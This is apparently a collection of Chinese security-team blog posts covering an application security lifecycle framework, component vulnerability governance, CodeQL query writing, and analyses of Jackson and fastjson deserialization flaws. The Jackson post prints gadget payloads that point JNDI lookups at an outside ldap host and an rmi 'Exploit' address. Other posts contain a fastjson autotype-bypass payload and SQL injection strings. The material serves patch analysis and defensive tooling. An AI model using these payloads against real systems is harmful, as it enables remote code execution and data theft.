“要求—检查—管控—防护”

从应用的整个生命周期来说，这是应用安全管控的主干思维流程，应用的变更大部分都体现为需求，在对研发流程上各类纬度的要求都可以体现在对需求的要求提示上。

整体的建设思路可类比为现代化交通治理的逻辑，将应用的构建、测试到发布线比作一条高速公路：将安全介入执行的SDLC比作载客大巴，安全是司机；将开发团队独自执行SDLC比作自驾；应用安全的执行要求是交通法规；检查手段是高速上的各类传感器（测试器、探头等）；管控手段是上高速的收费站，也可以是驾照的扣分制度；防护手段即是高速上的应急车道…如何保证高速公路上车辆有序、高效、安全的行驶，即是我们应用安全管控体系建设运营的启发参照。这么一想，豁然开朗…

执行要求

执行要求中，不论是作为SDLC中接口安全设计checklist要求，或是数据共享管控要求、隐私合规要求、监测埋点需求等其他广义上的各类研发要求，这些都可以作为提示项，放入需求阶段（研发管理平台）或者接口设计阶段（接口管理系统）中的安全提示。

在内网应用需求上提供基于问答式的安全自检解决方案，后期可以做到更加具体细致，对涉及尽可能多的场景抽象出一些需求场景的评审checklist。

编码阶段

接口设计中，将SDLC涉及的接口安全checklist作为接口设计（新增/修改）的必要属性。

使用内部嵌入安全组件的开发框架，例如将esapi改进为适合内部框架的安全组件集成到开发框架中，供开发自行选择使用。

在编码环节，提供嵌入IDE的安全编码助手插件（开源工具二次开发改进），供开发人员自助进行代码扫描，前移代码扫描环节。

测试阶段

在DEV/SIT测试环节，提供浏览器插件，供开发/测试人员自助进行动态扫描，前移动态扫描环节。

检查阶段

检查手段是关键一环，需要做到有要求必有检出的能力。

这里需要建设一系列检查手段，包括SDLC执行规范质量检查、基于流量的DAST、基于堆栈的IAST、基于代码的SAST、基于包库的组件及依赖检查、人工安全测试的五种检查手段。

SDLC执行检查（质量、规范），通过检测的版本迭代漏洞溯源SDLC执行过程质量。

通过splunk自动化分析SDLC执行规范、制定违规通报。

DAST被动+主动式的动态扫描器（主动模式下，积累归集流量中采集到的报文，替换登录态随时执行主动全量扫描），可参看之前文章《被动式漏洞扫描平台建设之路》。

SAST嵌入到CI流水线任务下的静态扫描器，确保每次git的代码提交都经过安全检测。

【存量及增量控制】

建设另一种思路下的IAST能力，与APM监测工具合作，记录堆栈数据，离线准实时检测安全漏洞，可参看之前文章《企业快速部署IAST/RASP能力的一种新思路》。其中在被动扫描器+IAST的模式下，可以做到部分场景下越权漏洞的检测。（2次替换cookie发包，对比带入的sql语句）

建设解决增量及存量的组件安全依赖扫描能力，可参看之前文章《通用组件安全治理三步走实践》。

在人工测试环节，对于重要应用的重要需求流转到人工测试环节，执行安全测试任务。

还需要做到的是，在自动化检查工具中增加实时提醒的功能，通过跟接口平台联动，将检查内容与要求挂钩，将安全整改工作尽量左移，一旦检查出不符合要求的点，可以立即通知到相关责任人进行整改，在卡版前给出研发整改时间。

管控阶段

通过检查过程中发现的问题，将检查结果数据跟各纬度的SR/SST/版本对应起来，存入安全运营平台中，这样就形成了版本—风险值的维度，初期我们定义一些简单的卡版规则，对不符合要求的版本卡发布，例如中高危漏洞不可发版，没有接入SSO不允许发版等。在持续建设后期可以根据各类安全规则给出版本的安全评分及安全检查报告，执行更精细的版本安全管控。

此外我们还需要一个基础应用安全元数据系统（通过同步运维、架构的全部应用基础数据），可以将检查结果对应用打上各类安全标识，为长期的应用安全治理工作打好基础；结合安全运营平台，更便捷地对各类安全漏洞、安全整改项做闭环跟进处置。（这里要感谢运维及架构兄弟们的支持，企业安全的建设水平非常依赖于组织内部运维及架构上的建设水准，这就类似高速公路上跑的各类汽车，运维架构标准化覆盖率上去后安全的建设水到渠成。）

防护阶段

应用发布后，研发流程的工作就告一段落，我们就需要对线上潜在的攻击行为做预警响应处置。

建设基于流量的入侵检测能力，流量安全分析，我们熟知的XX眼、各类WAF的日常运营。
建设传统的HIDS，我们熟知的XX云等日常的安全运营。
建设基于堆栈的攻击告警（RASP），这里因为我们的实践思路是通过采集应用堆栈日志离线分析，所以只是做攻击行为告警，之后再进行人工处置（跟正统的RASP思维来说差距就是实时阻断的能力，对传统金融行业的业务系统来说，实时阻断还是有些压力的，我们的方案只做堆栈埋点，在日志消费速率足够的情况下，做到实时攻击行为告警，之后人工处置。对这部分如感兴趣，可参看之前文章《企业快速部署IAST/RASP能力的一种新思路》。）
建设新增资产监控及常态安全巡检，掌控全部的应用资产，确保不会遗漏安全死角，新增应用及映射定时通知安全运营人员，确保得到把控。

建设最新的通用型安全漏洞预警，面对新出的安全漏洞时及时的分析对公司资产的影响程度。

总结

到此为止，我们从SDLC的思维模式逐步转变为全生命周期的广义应用安全管控体系。

建设这个体系后，带给我们几个提升：

1、提升了安全工作的覆盖面及安全运营效率，从针对重要应用的安全运营工作转变为对全部应用的体系化安全管控，无论是外部还是内部应用皆在安全运营范围内。

2、安全管控线上化标准化，在与测试及发布工具联动后，从依赖“人工版本把控”转变为依靠“系统判断”进行版本安全的管控。

3、从传统应用安全管控的角度转变为广义安全管控的角度，只要涉及研发流程，皆可通过这个模式来实现“要求—检查—管控”的整改落地（也可解决安全以外的研发整改问题），各类研发的整改皆可通过各类检查 + 跟进闭环 + 版本管控来实现“消化存量、管控增量”的目的，这个是非常重要的。

4、体系化提升，通过检查阶段的结果，反溯研发过程，给出各部门排名，从管理手段上提升研发同事的安全能力，安全更加可控。

5、不再仅限于发布前的应用安全管控，而是贯穿了应用全生命周期的安全管控体系。

等等，很香。

对一个大型的IT组织来说，在后续的运营过程中，我们还需要不断拓展我们的覆盖面，以及不断优化我们的检测深度，还有很多的路要走。

阅读原文

跳转微信打开

Jackson反序列化漏洞

Thu, 27 Aug 2020 17:42:00 +0800

原创 Glassy 2020-08-27 17:42

今天又看到有一些安全预警平台爆出的Jackson反序列漏洞，要求把Jackson升级到2.9.10.6，所以在下面对漏洞原理和适用范围做一下分析，并给出poc。

Author：平安银行应用安全团队@Glassy

引言

今天又看到有一些安全预警平台爆出的Jackson反序列漏洞，要求把Jackson升级到2.9.10.6，所以在下面对漏洞原理和适用范围做一下分析，并给出poc。

补丁分析

补丁特别简单，也如同漏洞公告一样，增加了几处黑名单。

POC构造

br.com.anteros.dbcp.AnterosDBCPDataSource

先看一下该jar包的maven引用次数

再构造poc（原理简单，不做细节描述）

["br.com.anteros.dbcp.AnterosDBCPDataSource", {"metricRegistry":"ldap://ytcrpi.ceye.io:1399/test"}]

com.pastdev.httpcomponents.configuration.JndiConfiguration

先看一下该jar包的maven引用次数

再构造poc

["com.pastdev.httpcomponents.configuration.JndiConfiguration", "ldap://gggg.ytcrpi.ceye.io:1399/test"]

com.nqadmin.rowset.JdbcRowSetImpl

先看一下该jar包的maven引用次数

再构造poc

["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}]

org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl

先看一下该jar包的maven引用次数

再构造poc

["org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl",{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}]

注意:这一条poc实际上是不可用的，其原因在于该类中因为存在重名函数导致的jackson在反序列化的时候会报同名函数冲突。这是一个原理层面可用，实际不可用的poc。

总结

1. 利用成功需要enableDefaultTyping；

2. Gadget的jar极其罕见。

结论：基本没什么用，不必大惊小怪，不放心请用poc自行去测试。

阅读原文

跳转微信打开

通用组件安全治理三步走实践

Wed, 19 Aug 2020 14:36:00 +0800

原创 shuaihu 2020-08-19 14:36

组件安全治理一直是备受关注的安全问题之一，对于企业安全建设来说，必须有一套从预警到整改的闭环方案。在此笔者想分享我们在组件安全治理上的实践，希望对大家有所帮助。

Author：平安银行应用安全团队-shuaihu

（本文暂不表供应链安全，这块相对比较复杂。）

这几年经常被提及的fastjson/struts2等开源、通用组件，其适用范围广，一旦存在漏洞，造成的危害非常大，这也是目前大部分公司面临的比较主要的组件安全问题。与此同时，企业内部组件安全治理的要求也不断在提升，对于企业安全建设来说，必须有一套从预警到整改的闭环方案。在此笔者想分享我们在组件安全治理上的实践，希望对大家有所帮助。

名词释义：

应用：是一个可以独立部署的具有特定完整功能的最小代码单，在一些公司内部也被理解成是可以拆分成的最小的一个系统。

子系统：多个应用的合集。

组件安全治理Round1

当发现某组件新出现安全漏洞时，我们可以通过SAST扫描仓库地址的方式将这些组件及版本信息和对应的仓库地址采集到，通过CMS（内部应用管理子系统）将仓库地址和应用对应起来，然后将应用的相关开发关联起来，这样即可完成组件漏洞-代码仓库-应用-开发人员的关联链路，实现精准推送漏洞至应用相关开发人员。

做到了这一步，我们就实现了组件治理从无到有的过程，实现了资产漏洞修复责任到人的工具化。

但我们也面临了一些困难：组件漏洞暂时无法解决二次依赖问题，会存在漏报、误报情况。例如部分开发通过修改仓库的pom文件内容修改组件版本，但并未真正发版，导致存在误报；再有就是线上代码实际使用的仓库及代码分支不一致问题（如部分使用release分支，部分使用master分支），导致检测出来的组件版本和线上并不一致，从而产生误报。另外，外购系统因无源码问题会导致漏报，部分开发测试未规范管理代码或未放入仓库也会导致漏报。

针对以上问题的优化思路：

当组件信息存在二次依赖的情况下，需要具备组件依赖信息的查询工具，需要线上环境的组件版本支撑，需要发布过程中的数据，确保组件数据是真实的而不是失效的。

组件安全治理Round2

通过部署HIDS厂商的产品，实现了服务器端组件采集功能。我们每天采集组件数据，每天更新验证线上还有哪些资产及哪些组件受影响。

通过获取CI过程中的成品包，进行成品包的扫描，可以获取即将发布应用的成品包依赖信息，包括二次依赖（这个工具是外购jf的xray产品，依赖分析还是很不错的，比较完整），然后通过CD工具获取该成品包部署到了哪些服务器上（公司的应用往往集群部署，并且进行灰度发布），可实现组件漏洞修复的全过程监控。

对于应用的部署都是单机单应用/单容器单应用的部署情况，通过此方案可实现组件漏洞-服务器/容器-应用-开发的关联链路，将漏洞推给责任干系人，并要求按照规定风险等级进行修复。同时我们也会将相关修复数据情况按照告警同步策略发送相关干系人及领导督促修复，并制作了各部门修复率及修复时效报表。

在此过程中我们建立了安全元数据的模型，新增了组件漏洞库数据，以及各应用在用的组件库信息，包括组件/版本/应用/服务器/组件路径或成品包路径信息。

通过安全元数据组件接口，可查询任意应用的组件依赖详细信息：

组件漏洞库接口：

基于以上，我们实现了如下几点：

1. 应用组件生命周期的监控，打包发布部署过程中的组件升级（低版本组件删除，高版本组件增加）；

2. 实现了二次依赖的关联分析；

3. 建立了安全元数据开源组件模型，元数据后端的组件数据T+1自动更新，开发可在修改代码后T+1天确认是否修复完成；

4. 形成报表统计给相关领导汇报，列出各个部门的修复排名（这个很重要），督促修复。

当然，上述实践过程同样也存在一些问题：

1. 部分备份的成品包会被检测到，导致误报；

2. 基于版本判断，对于一些漏洞版本有影响，但是漏洞利用条件较为苛刻，需要特定编码才会触发的漏洞，将扩大受影响资产。

对此我们的优化方案是：

1. 组件版本较低视为风险，并不一定可以利用，同时需要其他工具辅助测试验证，如各种扫描器；

2. 跟架构部门联合规范发布部署行为，禁止开发/运维将备份放到服务器上，删除备份包。

组件安全治理Round3

通过前2轮的技术论证可以检测出绝大多数的组件漏洞并可以进行自动验证。

实际修复情况可能和预期还有一些差距，真正落地解决问题还是有一些阻力。主要问题如下：

1. 外购系统是整体修复时效上的重灾区，真正修复花费的时间可能需两三个月甚至更多；

2. 部分二次依赖的组件问题，官方的组件包即使升级到最高版本，其依赖的组件包可能还是有漏洞的，需开发自测升级后是否有兼容性问题；

3. 部分开发团队安全意识较薄弱，认为组件安全问题影响不大，修复缓慢；

4. 少量新增的应用仍然出现了漏洞版本组件。

修复率统计：

以上问题可解决的方案：

1. 通过版本安全管控及组件黑名单的阻断机制，确保新增应用无历史组件安全问题。

2. 通过在组件仓库设置组件黑名单，如果使用低版本的组件将无法打包成功，强制要求开发升级版本。

3. 通过版本管控，如果应用版本发布过程中，仍然存在组件安全问题，将禁止发版强行阻断。

当然特定发布情况下允许放开限制，需要制定一些安全例外流程允许例外，这个时候就取决于业务优先还是安全优先了，结合实际情况进行分析。

组件安全漏洞版本发布阻断：

安全检测报告中组件安全漏洞检测纬度：

以上组件安全治理的实践经过几轮的迭代优化，目前已实现了一旦出现新的组件漏洞，可快速排查定位和分发处置，同时也可以实现存量历史组件漏洞的处理。在逐步推进运营的过程中，将会让漏洞组件越来越少，达到一个比较好的水平。

目前需要做主要是优化漏报及误报情况，在每次检测扫描的过程中，排查哪些场景还没有覆盖掉，为什么存在漏洞，然后case by case。在常态运营过程中，需不断迭代优化检测逻辑，查漏补缺。当然，不光是开源组件jar包，我们的nodejs 和python的这类第三方库，也可以用类似的方法去覆盖去解决。

另外很多公司会对一些开源的组件进行改造，以符合公司内部的场景，这种情况下，我们还需要将组件漏洞和企业二次改造的组件包进行分析验证，确认下是否受影响，使用同样的方式进行推进修复。

最终我们要实现对目标（应用）所依赖的全部组件信息进行管理，同时对组件信息库做安全标识，最终形成目标的组件安全分值，并且通过持续运营更新应用的组件安全分值。

阅读原文

跳转微信打开

CodeQL静态代码扫描之实现关联接口、入参、和危险方法并自动化构造payload及抽象类探究

Wed, 05 Aug 2020 10:17:00 +0800

原创 xsser 2020-08-05 10:17

author：平安银行应用安全团队@xsser

大背景

在CodeQL出来之前，我们拥有的静态代码扫描工具常见为：fortify，checkmarks，sonar，findbugs，pmd等，这些工具的特色有一些是基于静态的ast结构，例如pmd，纯静态的ast解析的工具存在误报多，无法追踪漏洞等致命的问题，而findbugs之类存在堆栈跟踪有限的情况，checkmarks的数据流又存在跟踪不全无法定义构造特定情况下的数据流的情况，重点是还要钱！

在这个情况下，CodeQL在2019年年底，即疫情爆发之际由微软发布了此工具。经过数月的研究发现，这个工具功能异常强大，其底层的图数据库非常好，可以编写自己描述的规则来寻找对应的数据流从而实现漏洞定位，甚至数据安全的一些实践。故把研究成果分享给大家，希望大家可以从中受益！

实现关联接口、入参、和危险方法并自动化构造payload

CodeQL介绍

CodeQL是一个史诗般质的跨越的工具，在这个之前，大家公认的顶峰可能是fortify。

QL是一种查询语言，支持对C++，C#，Java，JavaScript，Python，go等多种语言进行分析，可用于分析代码，查找代码中控制流等信息。

认识基础模块

首先引入1个模块，这个模块也是CodeQL的核心之一，那就是DataFlow模块。这个模块负责实现代码的数据流跟踪功能，即实现整个的调用栈分析。

这个模块最核心常用的方法就是hasFlowPath方法，它接受2个参数，一个是source，另一个是sink，这个模块是用来判断一个数据流，所以我们可以这样写代码：

from QueryInjectionSink query, DataFlow::PathNode source, DataFlow::PathNode sink where queryTaintedBy(query, source, sink)selectquery, source,sink

其中queryTaintedBy是一个“谓词”，通俗的说就是方法。这个方法里我们会去操作数据流的config配置。

按照上述写法就可以查询source到sink的数据流了。但直接这样查当然是不行的，我们还要约束一定的范围和条件，这里的QueryInjectionSink就是这个查询的配置，也就是config,它必须继承于TaintTracking::Configuration，所以我们要建立一个数据类型来表示这个

class QueryInjectionFlowConfig extends TaintTracking::Configuration {//定义配置 this可以随意写  QueryInjectionFlowConfig() { this = "SqlInjectionLib::QueryInjectionFlowConfig" }//定义source的来源，这里是来自RemoteFlowSource，这是一个官方写的class，较为全面的定义了远程可控的来源，但是还是有一些问题。我做了一些补充，以后会提及  override predicate isSource(DataFlow::Node src) { src instanceof RemoteFlowSource }//QueryInjectionSink定义了sink的约束条件  override predicate isSink(DataFlow::Node sink) { sink instanceof QueryInjectionSink }//过滤条件，这里对node中的数据类型做了判断，如果是一些int long之类的数据类型就会抛弃不会进入数据流判断，这也是CodeQL较为准确的识别SQL注入的原因之一。  override predicate isSanitizer(DataFlow::Node node) {    node.getType() instanceof PrimitiveType or    node.getType() instanceof BoxedType or    node.getType() instanceof NumberType  }}

这里的3个方法，isSource,isSink,isSanitizer，其中前面2个方法是必须要的，最后一个方法是用来设置过滤条件，还有一些可选的方法比如additonalstepxx等。

isSource是来源于RemoteFlowSource，这也是CodeQL解决SQL注入的强大的地方，这个是官方写的一个类，这个类覆盖了大部分的用户可控的来源，比如getParameter().getHost()等，甚至覆盖了Socket来源的，这也使得扫描出远程方法调用的反序列化情况变得更容易，再也不需要一行行靠经验来代码审计了。

然后接下来我们定义个谓词，也就是刚才上文说的queryTaintedBy方法(谓词)，我们这样写

predicate queryTaintedBy(  QueryInjectionSink query, DataFlow::PathNode source, DataFlow::PathNode sink) {  exists(QueryInjectionFlowConfig conf | conf.hasFlowPath(source, sink) and sink.getNode() = query)}

在这里，我们就可以实现一个查询了，其中conf变量就是用来定义查询配置的，然后使用conf配置去执行查询，也就是hasFlowPath方法。

在这个例子中，还有一个条件sink.getNode()=query，这里的query是一个QueryInjectionSink类型的。这个QueryInjectionSink类型要深入讲解的话大家要去看源代码了，SQL注入的一大部分重点就是在这个QueryInjectionSink类型上，他定义了很多sink的内容，实现了CodeQL对数据库查询的的覆盖。例如jdbc, hibernate等常见的方法，但是sink覆盖的不是很多，这个地方只能手动去加，官方留有余地的只写了3个(我的意思就是这个地方需要)，不过可以覆盖大部分的情况(这就给漏报提供了空间)。

分析需求

接下来我们要实现一个需求，即：识别一个应用的接口和对应的参数和对应的sink。(先只考虑Spring框架下)

然后我们来切割这个需求的操作过程，首先我们要操作source和sink，这个是必须的，接口的参数和路径通过source获得，对sink操作不大。然后我们会用到annotation这个类，这个类可以返回对应的注解给我们。获得source后，我们还要去识别对应接口接受参数的方法是post还是get，这个也很好办，我们获得参数的注解就完事了。如果是RequestParam那就认为是get，如果是其他的就认为是post，我这里比较粗暴和粗糙的去判断了，总体就是看一个思路。

实现过程

接下来我们开始定义个简单的谓词

string methodIsPostOrGet(DataFlow::PathNode source){    if source.getNode().asParameter().getAnAnnotation().toString().regexpMatch("RequestParam")    then result = "get"    else result = "post"   }

这是一个带返回结果的谓词，我们要定义它的类型。其中result是CodeQL自带的一个变量，用来返回这个方法的结果。

我们依然要用到DataFlow。

from QueryInjectionSink query, DataFlow::PathNode source, DataFlow::PathNode sink where queryTaintedBy(query, source, sink)selectquery, "接口地址:",//获得source的注解的值，Spring中为接口地址source    .getNode()    .asParameter()    .getCallable()    .getAnAnnotation()    .getValue("value"),"接口参数:",//获得接口的参数名source    .getNode()    .asParameter()    .getAnAnnotation().getValue("value"),//获得sink所在的文件位置"文件地址:",sink.getNode().asExpr().getLocation(),//获得source节点的路径的http方法"请求类型:",methodIsPostOrGet(sink),"注解内容为:",//获得注解source.getNode().asParameter().getAnAnnotation().toString()

结果

最后实现结果如下

至此，我们大概的实现了一个简单的数据流的元数据提取，我们拿到了几个重要的数据：接口路径，接口参数，方法类型，是否有sink，文件路径。

思考

基于这几个数据，我们可以把其他漏洞类型的ql规则改造成统一的。然后我们每次静态扫描的时候就可以获得这些数据，这样的话，扫描完成我们再去解析对应的json，即可实现扫描完成自动化实现和封装这个漏洞对应的payload。

例如

POST http/1.1header:xxxxx
Username=xsser’ and 1=1

抑或是

GET /url/from/Spring?username=xsser%27 and 1=1 http/1.1hederxxxxxxx

当然，有了基础数据，怎么利用就是天马行空的另一个排列组合的思考范畴了，例如你可以弥补一些iast无法定位到来源参数的困难，或者是sink上的不足，或者是无法建立数据流的关联性，比如数据安全中强调的数据生命周期。对于静态代码来说这个比较难追踪或者建立对应的联系，大部分收集到的数据是非关系型数据，但是通过CodeQL这样去实现，我们不仅可以实现代码漏洞的挖掘，顺便可以把资产的元数据提取工作也做了，这些元数据又可以在提供给数据安全的同时用来关联数据的对应关系。

在存量较大的情况，我们可以实现SQL语句的字段对应到controller和参数，当你深入了解了CodeQL，你会发现我说的这些仅仅是冰山一角。

抽象类探究

我在阅读了CodeQL大量插件的代码的情况下发现了一个有趣的结构，这个结构就是抽象方法实例化的时候会自动执行子类的方法，而不需要调用子类的方法。这个结构大量存在于CodeQL的规则中，这里我以CWE-022，TaiantedPath.ql作为例子来讲解

首先这个规则的主体是：

在上一部分的讲解中，我们了解到了数据流必须使用DataFlow::xxx和TaintTracking::configuration，其中conf是对数据流进行配置，而这里，我圈出来的any()方法中的就是对一个sink的约束，他的约束主要在PathCreation类和guarded谓词中。这里重点就是在讲解PathCreation类。

首先它是一个静态类，作者抽象了PathCommon.qll库，在这个库里我们可以看到这个方法的原型(Construtor)，我把它抽象下结构如下：

abstract class PathCreation extends Expr {  abstract Expr getInput();}
class PathsGet extends PathCreation, MethodAccess {  PathsGet() {    …  }
  override Expr getInput() { result = this.getAnArgument() }}
class FileSystemGetPath extends PathCreation, MethodAccess {  FileSystemGetPath() {    …  }
  override Expr getInput() { result = this.getAnArgument() }}
class FileCreation extends PathCreation, ClassInstanceExpr {  FileCreation() { …}
  override Expr getInput() {    result = this.getAnArgument() and    // Relevant arguments include those that are not a `File`.    not result.getType() instanceof TypeFile  }}
class FileWriterCreation extends PathCreation, ClassInstanceExpr {  FileWriterCreation() { this.getConstructedType().getQualifiedName() = "java.io.FileWriter" }
  override Expr getInput() {    result = this.getAnArgument() and    // Relevant arguments are those of type `String`.    result.getType() instanceof TypeString  }}
predicate inWeakCheck(Expr e) {  none()}
// Ignore cases where the variable has been checked somehow,// but allow some particularly obviously bad cases.predicate guarded(VarAccess e) {  none()  )}

聪明的你可以发现，下面的子类都是继承于PathCreation类，并且重写了一个getInput方法，这个方法我们可以看到都带有result关键词，并且是一个带类型的返回型谓词。根据官方文档的说明，带result就会把符合条件的集合返回。而且可以看到，返回的谓词中大部分都有this.getAnArgument，这个意思就是返回满足上面的参数集合，他们有一个共性，都extends 了PathCreation类。那时候我就好奇了，这个类全文却没地方调用过，或者实例化。

全文档搜索了也没发现有这个类的实例化。然后我对这个规则简单的调试了下，发现注释掉部分子类的代码，并且执行了PathCreation和PathGet、 FileCreation和FileWriterCreation发现就是这几个子类的总集合。

这是总的集合

这是PathGet

这是FileCreation

到此，我们可以得出一个结论: CodeQL对抽象类的查询会筛选出所有满足子类条件的结果集合，而至于需不需要返回，这个就需要你自己去手动定义个谓词来返回。

到这里我相信你就可以去了解一些必须要理解的类，比如RemoteFlowSource类，这对编写插件如何更好的排版代码编写规则逻辑也很有帮助！

下面是PathsCommon的主体的注释，希望能帮你理解

abstract class PathCreation extends Expr {    abstract Expr getInput();  }    class PathsGet extends PathCreation, MethodAccess {    // 寻找`java.nio.file.Paths`类下的get方法    PathsGet() {      exists(Method m | m = this.getMethod() |        m.getDeclaringType() instanceof TypePaths and        m.getName() = "get"      )    }    // 返回这个方法的集合    override Expr getInput() { result = this.getAnArgument() }  }    class FileSystemGetPath extends PathCreation, MethodAccess {    // 寻找`java.nio.file.FileSystem`类下的getPath方法并通过getInput方法返回这个集合    FileSystemGetPath() {      exists(Method m | m = this.getMethod() |        m.getDeclaringType() instanceof TypeFileSystem and        m.getName() = "getPath"      )    }      override Expr getInput() { result = this.getAnArgument() }  }    class FileCreation extends PathCreation, ClassInstanceExpr {    //   限定实例化的对象的原型在`java.io.File`类下    // 例如new xxx()  这个xxx必须在`java.io.File`下    FileCreation() { this.getConstructedType() instanceof TypeFile }      override Expr getInput() {        // 获得上述实例化的class的参数，并且这个参数的类型必须是file类型的，并返回满足and条件的参数集合      result = this.getAnArgument() and      // Relevant arguments include those that are not a `File`.      not result.getType() instanceof TypeFile    }  }    class FileWriterCreation extends PathCreation, ClassInstanceExpr {    //   限定在`java.io.FileWriter`类下    FileWriterCreation() { this.getConstructedType().getQualifiedName() = "java.io.FileWriter" }    // 返回参数类型是String类型的参数    override Expr getInput() {      result = this.getAnArgument() and      // Relevant arguments are those of type `String`.      result.getType() instanceof TypeString    }  }    predicate inWeakCheck(Expr e) {    // None of these are sufficient to guarantee that a string is safe.    // 约束一个类下的方法如果是startswith等方法，注意这里的方法是原生的，这里建议扩大覆盖范围，使用matches去匹配类似的方法名    exists(MethodAccess m, Method def | m.getQualifier() = e and m.getMethod() = def |      def.getName() = "startsWith" or      def.getName() = "endsWith" or      def.getName() = "isEmpty" or      def.getName() = "equals"    )    or    // Checking against `null` has no bearing on path traversal.    exists(EqualityTest b | b.getAnOperand() = e | b.getAnOperand() instanceof NullLiteral)  }    // Ignore cases where the variable has been checked somehow,  // but allow some particularly obviously bad cases.  predicate guarded(VarAccess e) {    //   一个参数必须存在于上面抽象类返回结果的集合中且条件分支为True的情况下的方法，还要不是StartsWith等方法    exists(PathCreation p | e = p.getInput()) and    exists(ConditionBlock cb, Expr c |      cb.getCondition().getAChildExpr*() = c and      c = e.getVariable().getAnAccess() and      cb.controls(e.getBasicBlock(), true) and      // Disallow a few obviously bad checks.      not inWeakCheck(c)    )  }

喜欢请点关注👇

阅读原文

跳转微信打开

fastjson68版本绕过autotype原理及利用场景分析

Wed, 17 Jun 2020 10:11:00 +0800

原创 Glassy 2020-06-17 10:11

fastjson 68版本前一阵子有些闹得沸沸扬扬的，今天看到fastjson代码已经跟进到71版本了，所以对68和69版本的代码做了一下比对，看了一下修复代码，这里对68版本fastjson的RCE漏洞做一下原理以及利用场景的分析。

author：平安银行应用安全团队@Glassy

引言

fastjson 68版本前一阵子有些闹得沸沸扬扬的，我这边也一直忙着写字节码扫描器没太用心关注，今天看到fastjson代码已经跟进到71版本了，所以对68和69版本的代码做了一下比对，看了一下修复代码，这里对68版本fastjson的RCE漏洞做一下原理以及利用场景的分析。

注：其实最初在5月10号的时候我这边就已经看到了68版本的一种利用方式，基于Throwable子类的利用方式，不过这种方式只是68版本利用方式中的一种。

原理

fastjson的漏洞跟进的比较多的情况下，可以明白一个基本的套路就是，不管绕过怎么样的风骚，修复代码大部分都在ParserConfig类的checkAutoType里面，所以就话不多说，把68版本和69版本的ParserConfig类做个比较，看到改动还是很少的。

基本上一看可以看出是和expectClass有关，所以在函数的上上下下看了一下这个变量，可以归并一下发现的信息：

1. expectClass不为代码中的那些类的时候可以将expectClassFlag设置为true

2. 当expectClassFlag为true的时候，即使fastjson的autoype为false我们也能加载期望类的实例。

OK但从上诉两点，我们就可以看到借由expectClass我们是可以绕过fastjson的autotype安全限制的，这个安全通告相符合，代表我们走在正确的方向上。

但是在阅读checkAutoType函数中expectClass的代码的时候，也发现了其中一些会限制Gadget的点：

1. 黑名单检测逻辑是放在loadClass之前的，也就是说我们的Gadget将依旧受到黑名单的限制。（代码太长，我就不贴了）

2. Gadget必须实现了expectClass接口（或是expectClass的子类），才能成功生成Gadget的实例。

上面便是阅读代码得到的关键性信息了，接下来就要思考一下expectClass的问题了，第一个问题，expectClass是从哪里来的，看一下checkAutoType函数：

java public Class checkAutoType(String typeName, Class expectClass, int features)

很清晰，expectClass就是直接传给checkAutoType函数的，那么接下来我们需要去寻找，究竟哪些地方会给checkAutoType函数传expectClass，全局搜索一下，可以看到场景非常少：

JavaBeanDeserializer类的deserialze函数
ThrowableDeserializer类的deserialze函数

关于第二种场景，我这边5月10号就到了别的大佬的分析，有兴趣大家可以去看一下，我就不再赘述，这里着重讲第一种。（当然其实就原理而言完全是一回事。）

DefaultJSONParser调用parseObject，用@type生成的clazz实例会紧接着传入JavaBeanDeserializer类的deserialze方法的type参数中，并继续解析json数据，如果json数据中还有@type，则把@type的值作为typeName，type参数作为expectClass传入checkAutoType函数中。

那根据我们刚刚分析代码得出的结论，如果typeName刚好为expectClass的子类，那么接下来就能生成typename的对象，从而达成绕过autotype的目的。

但是，这里一定要注意一个特别重要的问题，由于默认autotype是关着的，那么我们又怎么样去用@type来生成传给deserialze的clazz呢，下面我就先给出目前fastjson在autotype关闭的情况下能生成的clazz的范围：

1. cache mapping:48版本以前fastjson允许用户通过{"@type":"java.lang.Class","val":"com.evilClass"}的形式向mapping里面添加恶意类，这样不需要依赖autotype可以直接从cahce的mapping里获取clazz，但是48版本已经修复该问题。当然cache mapping在刚fastjson启动的时候就已经放了不少clazz，加载的时候不受autotype限制。

2. 白名单：不赘述，白名单的目的就是不受autotype的限制嘛。不过新版本白名单已经被加密，需要爆破一下。

3. 默认deserializers的buckets（在PaserConfig类的initDeserializers函数中初始化）：可以把fastjson理解为一个编译器，它在进行初始化的时候也需要加载一些基础类型的对象，这些对象为了组件的正常工作是必须的。

所以我们需要的clazz就是要从上诉列举的三种情况里面寻找到，与此同时保证它不再黑名单里面。

OK，全部的分析已经到位，我们来汇总一下，看看poc究竟要怎么写：

1. 首先要用@type来生成一个clazz（不受autotype影响的）。从而把这个clazz传入deserialze函数的exceptClass中，要保证clazz不能为以下类。（这个是68版本的，69版本又添加了三个。）

2. 紧跟在生成在第一个@type后面，再跟一个@type，它的value不能是黑名单里面的类，而且必须是第一个clazz的子类。

之后便能生成一个不受autotype影响的clazz，以达到利用效果。

关于漏洞的复现，为了方便起见，我就直接去拿了69版本被拉黑而68版本没被拉黑的AutoCloseable接口来构造poc了。

因为想要利用成功必须保证第二个clazz实现AutoCloseable的接口，恶意类难找，我们只聊原理，我就随便写了一个利用类。

javapackage defaultpack;
import com.alibaba.fastjson.JSON;import com.sun.rowset.JdbcRowSetImpl;import org.h2.tools.SimpleResultSet;
import java.lang.reflect.Field;
public class Person implements AutoCloseable{    private String name;    private int age;    private String gender;
    public Person() {        System.out.println("no-arg construct invoked!!!");    }
    public Person(String name, int age, String gender) {        this.name = name;        this.age = age;        this.gender = gender;    }
    public String getName() {        return name;    }
    public void setName(String name) {        this.name = name;    }
    public int getAge() {        System.out.println("getAge invoked!!!");        return age;    }
    public void setAge(int age) {        this.age = age;        System.out.println("setAge invoked!!!");    }
    public String getGender() {        return gender;    }
    public void setGender(String gender) {        this.gender = gender;    }
    @Override    public void close() throws Exception {
    }}

利用的poc如下：

javaString payload = "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"defaultpack.Person\",\"age\":\"13\"}";
JSON.parseObject(payload);

成功利用的截图如下，可以看到在68版本autype默认为关的情况下，依旧成功调用了Person类的setAGe方法：

利用场景分析

可以从上面的分析看出，虽然在原理层面上，的确存在着代码执行的风险，且绕过了autotype机制，但是这个利用受到了多方面限制：

黑名单限制
漏洞利用类必须拥有一个在autotype关着的情况下可以生成实例的父类（目前在68版本我已知的是Throwable和AutoCloseable）。

